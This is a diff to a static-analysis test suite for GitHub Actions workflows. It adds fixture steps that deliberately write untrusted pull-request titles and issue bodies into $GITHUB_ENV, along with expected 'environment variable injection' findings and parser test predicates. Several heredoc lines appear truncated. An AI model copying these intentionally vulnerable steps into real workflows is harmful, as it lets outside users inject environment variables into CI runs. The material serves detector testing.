.github/workflows/multiline.yml@32:13:32:39 | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:34:9:40:6 | .github/workflows/multiline.yml@34:9:40:6 | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:35:14:39:14 | .github/workflows/multiline.yml@35:14:39:14 | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:40:9:46:6 | .github/workflows/multiline.yml@40:9:46:6 | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:41:14:45:14 | .github/workflows/multiline.yml@41:14:45:14 | +| .github/workflows/multiline.yml:46:9:52:6 
| Run Step | .github/workflows/multiline.yml:46:9:52:6 | .github/workflows/multiline.yml@46:9:52:6 | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:47:14:51:14 | .github/workflows/multiline.yml@47:14:51:14 | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:52:9:58:6 | .github/workflows/multiline.yml@52:9:58:6 | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:53:14:57:14 | .github/workflows/multiline.yml@53:14:57:14 | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:58:9:63:6 | .github/workflows/multiline.yml@58:9:63:6 | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:59:14:62:14 | .github/workflows/multiline.yml@59:14:62:14 | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:63:9:66:6 | .github/workflows/multiline.yml@63:9:66:6 | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:64:14:65:136 | .github/workflows/multiline.yml@64:14:65:136 | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:66:9:71:6 | .github/workflows/multiline.yml@66:9:71:6 | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:67:14:70:36 | .github/workflows/multiline.yml@67:14:70:36 | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:71:9:78:6 | .github/workflows/multiline.yml@71:9:78:6 | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> 
"$GITHUB_ENV"\n | .github/workflows/multiline.yml:72:14:77:29 | .github/workflows/multiline.yml@72:14:77:29 | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:78:9:85:6 | .github/workflows/multiline.yml@78:9:85:6 | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:79:14:84:29 | .github/workflows/multiline.yml@79:14:84:29 | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:9:89:29 | .github/workflows/multiline.yml@85:9:89:29 | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:86:14:89:29 | .github/workflows/multiline.yml@86:14:89:29 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | @@ -444,7 +614,7 @@ nodeLocations | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | scopes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/test.yml:1:1:40:53 | on: push | sources | ahmadnassri/action-changed-files | * | output.files | filename | manual | 
@@ -575,20 +745,59 @@ testNormalizeExpr | github.event.pull_request.user["login"] | github.event.pull_request.user.login | | github.event.pull_request.user['login'] | github.event.pull_request.user.login | | github.event.pull_request['user']['login'] | github.event.pull_request.user.login | +writeToGitHubEnv1 +| JSON_RESPONSE<> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}) | PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV})\nEOF | +| VAR0 | $TITLE | VAR0<> $GITHUB_ENV) | VAR3<> $GITHUB_ENV)\nEOF | +| VAR4 | ${ISSUE_BODY1} | VAR4=${ISSUE_BODY1} | +| VAR5 | Hello\nWorld | VAR5<> $GITHUB_ENV", - "echo 'sha2=$(> $GITHUB_ENV", - "echo sha3=$(> $GITHUB_ENV", + "FOO\n{\n echo 'JSON_RESPONSE<> \"$GITHUB_ENV\"\nBAR" + //"FOO\n{\n echo 'JSON_RESPONSE<> \"$GITHUB_ENV\"\nBAR", + //"FOO\necho \"VAR3<> $GITHUB_ENV\necho \"$TITLE\" >> $GITHUB_ENV\necho \"EOF\" >> $GITHUB_ENV\nBAR", ] and - extractLineAssignment(t, "ENV", key, value) + //linesFileWrite(t, _, "$GITHUB_ENV", content, _) + blockFileWrite(t, _, "$GITHUB_ENV", content, _) + //extractFileWrite(t, "GITHUB_ENV", content) ) } -query predicate writeToGitHubOutput(string key, string value) { +query predicate writeToGitHubEnv(string key, string value, string content) { exists(string t | t = [ - "echo \"::set-output name=id1::$(> $GITHUB_OUTPUT", - "echo 'sha2=$(> $GITHUB_OUTPUT", - "echo sha3=$(> $GITHUB_OUTPUT", - "echo sha4=$(> \"$GITHUB_OUTPUT\"", - "echo sha5=$(> ${GITHUB_OUTPUT}", - "echo sha6=$(> \"${GITHUB_OUTPUT}\"", + // block + "{\n echo 'VAR0<> \"$GITHUB_ENV\"\n", + "{\necho 'VAR1<> \"$GITHUB_ENV\"", + "{\necho 'VAR2<> \"$GITHUB_ENV\"", + "FOO\n{\n echo 'VAR22<> \"$GITHUB_ENV\"\nBAR", + // multiline + "FOO\necho \"VAR3<> $GITHUB_ENV\necho \"$TITLE\" >> $GITHUB_ENV\necho \"EOF\" >> $GITHUB_ENV\nBAR", + "echo \"PACKAGES_FILE_LIST<> \"${GITHUB_ENV}\"\nls | grep -E \"*.(tar.gz|zip)$\" >> \"${GITHUB_ENV}\"\nls | grep -E \"*.(txt|md)$\" >> \"${GITHUB_ENV}\"\necho 
\"EOF\" >> \"${GITHUB_ENV}\"", + // heredoc 1 + "cat >> $GITHUB_ENV << EOL\nVAR4=${ISSUE_BODY1}\nEOL", + "cat > $GITHUB_ENV << EOL\nVAR5<> $GITHUB_ENV\nVAR6=${ISSUE_BODY3}\nEOL\n", + "cat < $GITHUB_ENV\nVAR7<> \"$GITHUB_ENV\"\nVAR8=$(echo \"FOO\")\nVAR9<> $GITHUB_ENV", + "echo 'VAR14=$(> $GITHUB_ENV", + "echo VAR15=$(> $GITHUB_ENV", + "echo VAR16=$(cat issue.txt | sed 's/\\r/\\n/g' | grep -ioE '\\s*[a-z0-9_-]+/[a-z0-9_-]+\\s*$' | tr -d ' ') >> $GITHUB_ENV", ] and - extractLineAssignment(t, "OUTPUT", key, value) + extractFileWrite(t, "GITHUB_ENV", content) and + extractVariableAndValue(content, key, value) + ) +} + +query predicate writeToGitHubOutput(string key, string value, string content) { + exists(string t | + t = + [ + "echo \"::set-output name=VAR1::$(> $GITHUB_OUTPUT", + "echo 'VAR5=$(> $GITHUB_OUTPUT", + "echo VAR6=$(> $GITHUB_OUTPUT", + "echo VAR7=$(> \"$GITHUB_OUTPUT\"", + "echo VAR8=$(> ${GITHUB_OUTPUT}", + "echo VAR9=$(> \"${GITHUB_OUTPUT}\"", + ] and + extractFileWrite(t, "GITHUB_OUTPUT", content) and + extractVariableAndValue(content, key, value) + ) +} + +query predicate isBashParameterExpansion(string parameter, string operator, string params) { + exists(string test | + test = + [ + "$parameter1", "${parameter2}", "${!parameter3}", "${#parameter4}", "${parameter5:-value}", + "${parameter6:=value}", "${parameter7:+value}", "${parameter8:?value}", + "${parameter9:=default value}", "${parameter10##*/}", "${parameter11/#pattern/string}", + "${parameter12/%pattern/string}", "${parameter13,pattern}", "${parameter14,,pattern}", + "${parameter15^pattern}", "${parameter16^^pattern}", "${parameter17:start}", + "${parameter18#pattern}", "${parameter19##pattern}", "${parameter20%pattern}", + "${parameter21%%pattern}", "${parameter22/pattern/string}", + "${parameter23//pattern/string}", + ] and + isBashParameterExpansion(test, parameter, operator, params) ) } 
diff --git a/ql/test/query-tests/Security/CWE-020/.github/workflows/reusable_workflow.yml b/ql/test/query-tests/Security/CWE-020/.github/workflows/reusable_workflow.yml index 0ca7ecdfbde3..c2e9e17160d3 100644 --- a/ql/test/query-tests/Security/CWE-020/.github/workflows/reusable_workflow.yml +++ b/ql/test/query-tests/Security/CWE-020/.github/workflows/reusable_workflow.yml @@ -27,7 +27,7 @@ jobs: CONFIG_PATH: ${{ inputs.config-path }} run: | echo ${{ inputs.config-path }} - echo "::set-output name=step-output:: $CONFIG_PATH" + echo "::set-output name=step-output::$CONFIG_PATH" - name: Get changed files id: step2 uses: tj-actions/changed-files@v40 diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml index 154a8135bad4..7b30ec8b7e42 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml @@ -36,14 +36,14 @@ jobs: run: | { echo 'JSON_RESPONSE<> "$GITHUB_ENV" + echo "$TITLE" echo EOF } >> "$GITHUB_ENV" - env: TITLE: ${{ github.event.pull_request.title }} run: | cat <<-EOF >> "$GITHUB_ENV" - echo "FOO=$TITLE" + FOO=$TITLE EOF - env: TITLE: ${{ github.event.pull_request.head.ref }} @@ -55,6 +55,17 @@ jobs: - run: echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV env: TARGET_BRANCH: ${{ github.event.pull_request.title }} + - run: echo ISSUE_KEY=$(echo "${TITLE}" | grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV + env: + TITLE: ${{ github.event.pull_request.title }} + - env: + TITLE: |- + ${{ github.event.pull_request.title }} + run: | + cat > issue.txt << EOL + ${TITLE} + EOL + echo REPO_NAME=$(cat issue.txt | sed 's/\r/\n/g' | grep -ioE '\s*[a-z0-9_-]+/[a-z0-9_-]+\s*$' | tr -d ' ') >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 369085708a06..ffaaf91e5504 100644 
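Review bot: The last step added to test4.yml (the `TITLE: |-` env block followed by `cat > issue.txt << EOL … EOL` and `echo REPO_NAME=$(cat issue.txt | sed … | tr -d ' ') >> $GITHUB_ENV`) produces no new row in the EnvVarInjectionCritical.expected and EnvVarInjectionMedium.expected hunks shown here, whereas the `ISSUE_KEY=` step just above it does (edge from `test4.yml:60:19:60:56` to `58:14:58:94`), and nothing in the fixture records whether that silence is intended. If taint that reaches `$GITHUB_ENV` only through an intermediate file is deliberately out of scope, say so next to the step, e.g. `# not flagged: tainted TITLE reaches GITHUB_ENV only via issue.txt, which the query does not follow`; if it is a known gap, a `# TODO` with the same wording keeps the fixture honest. The `ISSUE_KEY=` step would similarly benefit from `# positive: tainted TITLE reaches GITHUB_ENV through a pipeline inside $(...)`, since without a label it is indistinguishable in purpose from the existing `BRANCH=` case. The first hunk's change of `echo "FOO=$TITLE"` to `FOO=$TITLE` inside the `cat <<-EOF >> "$GITHUB_ENV"` heredoc is presumably meant to make the fixture a real `NAME=value` write; a one-line comment stating that would also help, as the fixture is otherwise uncommented.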
--- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected 
@@ -6,9 +6,10 @@ edges | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | nodes | 
.github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | 
@@ -26,11 +27,13 @@ nodes | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | semmle.label | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | semmle.label | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | semmle.label | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | semmle.label | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | semmle.label 
| github.event.pull_request.title | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | subpaths 
@@ -42,7 +45,8 @@ subpaths | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | +| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 241a33146b88..28fffe0e5e4d 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected 
@@ -6,9 +6,10 @@ edges | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | nodes | 
.github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | 
@@ -26,11 +27,13 @@ nodes | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | semmle.label | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> 